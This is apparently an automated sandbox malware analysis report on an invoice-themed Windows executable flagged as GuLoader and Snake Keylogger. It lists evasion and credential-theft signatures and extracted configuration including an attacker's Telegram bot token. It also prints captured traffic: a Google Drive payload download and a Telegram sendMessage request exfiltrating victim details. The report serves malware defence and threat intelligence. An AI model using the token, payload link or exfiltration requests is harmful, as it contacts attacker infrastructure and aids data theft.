Windows Analysis Report
Factura Honorarios 2024-11-17.exe

Overview

General Information

Sample name:	Factura Honorarios 2024-11-17.exe
Analysis ID:	1557624
MD5:	2494d7b2fd14dc5604fd6aa412f170fc
SHA1:	dc2b1e324c49c9f0fa446211ed24841c48371ef0
SHA256:	0cf14ff76c5d927ad6de94e8d632592a776adb36c733680fcf6385a5d1fed069
Tags:	exeuser-TeamDreier
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Found malware configuration

Source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Factura Honorarios 2024-11-17.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391787A8 CryptUnprotectData,		3_2_391787A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39178EF1 CryptUnprotectData,		3_2_39178EF1

Uses 32bit PE files

Source: Factura Honorarios 2024-11-17.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2

Source: Factura Honorarios 2024-11-17.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00402868 FindFirstFileW,	3_2_00402868
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_004065C7 FindFirstFileW,FindClose,	3_2_004065C7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405996

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015F45Dh	3_2_0015F2C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015F45Dh	3_2_0015F4AC
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015F45Dh	3_2_0015F52F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015FC19h	3_2_0015F974
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F831E0h	3_2_38F82DC8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F82C19h	3_2_38F82968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8E501h	3_2_38F8E258
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8D3A1h	3_2_38F8D0F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8CF49h	3_2_38F8CCA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_38F80040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8FAB9h	3_2_38F8F810
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F831E0h	3_2_38F82DC4
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8DC51h	3_2_38F8D9A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8D7F9h	3_2_38F8D550
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F831E0h	3_2_38F8310E
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8E959h	3_2_38F8E6B0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8E0A9h	3_2_38F8DE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8F661h	3_2_38F8F3B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8F209h	3_2_38F8EF60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F80D0Dh	3_2_38F80B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F81697h	3_2_38F80B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8EDB1h	3_2_38F8EB08
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391779C9h	3_2_39177720
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39177EB5h	3_2_39177B78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39179280h	3_2_39178FB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917C826h	3_2_3917C558
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917E816h	3_2_3917E548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39170FF1h	3_2_39170D48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39171449h	3_2_391711A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917ECA6h	3_2_3917E9D8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391718A1h	3_2_391715F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917CCB6h	3_2_3917C9E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391762D9h	3_2_39176030
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917BF06h	3_2_3917BC38
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917DEF6h	3_2_3917DC28
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391702E9h	3_2_39170040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39173709h	3_2_39173460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39170741h	3_2_39170498
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then mov esp, ebp	3_2_3917B081
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391732B1h	3_2_3917308F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39176733h	3_2_39176488
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917E386h	3_2_3917E0B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917C396h	3_2_3917C0C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39170B99h	3_2_391708F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917B5E6h	3_2_3917B318
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391725A9h	3_2_39172300
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917D5D6h	3_2_3917D308
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391755D1h	3_2_39175328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39172A01h	3_2_39172758
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917DA66h	3_2_3917D798
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39175A29h	3_2_39175780
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917FA56h	3_2_3917F788
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39172E59h	3_2_39172BB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917BA76h	3_2_3917B7A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39175E81h	3_2_39175BD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39176CC1h	3_2_39176A18
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391748C9h	3_2_39174620
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39171CF9h	3_2_39171A50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39177119h	3_2_39176E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917D146h	3_2_3917CE78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39174D21h	3_2_39174A78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917F136h	3_2_3917EE68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39172151h	3_2_39171EA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39175179h	3_2_39174ED0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39177571h	3_2_391772C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917F5C6h	3_2_3917F2F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E6970h	3_2_391E6678
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E1E47h	3_2_391E1BA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E6347h	3_2_391E5FD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391ECDD8h	3_2_391ECAE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E2BE6h	3_2_391E2918
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EC910h	3_2_391EC618
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E19DEh	3_2_391E1710
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E9E08h	3_2_391E9B10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E4BD7h	3_2_391E4908
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E7300h	3_2_391E7008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EE0F8h	3_2_391EDE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3506h	3_2_391E3238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EDC30h	3_2_391ED938
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EB128h	3_2_391EAE30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E54F6h	3_2_391E5228
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8620h	3_2_391E8328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EF418h	3_2_391EF120
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3E26h	3_2_391E3B58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EEF50h	3_2_391EEC58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EC448h	3_2_391EC150
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E5E16h	3_2_391E5B48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E9940h	3_2_391E9648
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E030Eh	3_2_391E0040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E6E38h	3_2_391E6B40
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E4746h	3_2_391E4478
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391ED768h	3_2_391ED470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EAC60h	3_2_391EA968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E0C2Eh	3_2_391E0960
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8158h	3_2_391E7E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E5066h	3_2_391E4D98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E7C90h	3_2_391E7998
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EEA88h	3_2_391EE790
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E2756h	3_2_391E2488
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EBF80h	3_2_391EBC88
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E154Eh	3_2_391E1280
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E9478h	3_2_391E9180
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E5986h	3_2_391E56B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8FB0h	3_2_391E8CB8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EFDA8h	3_2_391EFAB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3076h	3_2_391E2DA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391ED2A0h	3_2_391ECFA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EA798h	3_2_391EA4A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EA2D0h	3_2_391E9FD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E079Eh	3_2_391E04D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E77C8h	3_2_391E74D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3996h	3_2_391E36C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EE5C0h	3_2_391EE2C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EBAB8h	3_2_391EB7C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E22C6h	3_2_391E1FF8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EB5F0h	3_2_391EB2F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E10BEh	3_2_391E0DF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8AE8h	3_2_391E87F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E42B6h	3_2_391E3FE8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EF8E0h	3_2_391EF5E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211FE8h	3_2_39211CF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39210801h	3_2_39210508
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211658h	3_2_39211360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39210CC8h	3_2_392109D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211B20h	3_2_39211828
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39210338h	3_2_39210040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211190h	3_2_39210E98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39393E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39393E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_393909E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39390A10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39390D26

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 142.250.185.174:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

